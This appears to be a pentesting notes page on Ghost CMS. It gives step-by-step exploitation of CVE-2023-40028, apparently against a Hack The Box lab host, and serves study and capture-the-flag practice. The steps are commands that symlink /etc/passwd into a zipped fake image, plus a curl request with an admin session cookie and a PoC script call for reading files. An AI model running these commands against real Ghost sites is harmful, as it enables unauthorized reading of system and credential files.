Ghost CMS

Open source content management system platform written in JavaScrip

Enumeration

base URL for the Admin API

/ghost/api/admin

CVE-2023-40028 - Arbitrary File Read

Vulnerable version prior to 5.59.1

The vulnerability allows authenticated users to upload symlinks that will allow attackers to access files outside of content/

Manual Exploit

mkdir -p exploit/content/images/

Create the symbolic link

ln -s /etc/passwd exploit/content/images/test-file.png

-y tells zip to include symbolic links

zip -r -y exploit.zip exploit/

Upload the file

curl -b 'ghost-admin-api-session=s%3AbWhDHjQNa5JeU809QF2JPW6e4UEss2Em.g6N0Kedu5O7xKtx8RF30BBpoEO1OMgdIJ%2BazK7H6nWY' http://linkvortex.htb/content/images/test-file.png

POC

Link

Make sure to modify GHOST_URL value before using it

Read files

./CVE-2023-40028.sh -u username -p password

PreviousNeo4j NextBackDrop CMS

Last updated 3 months ago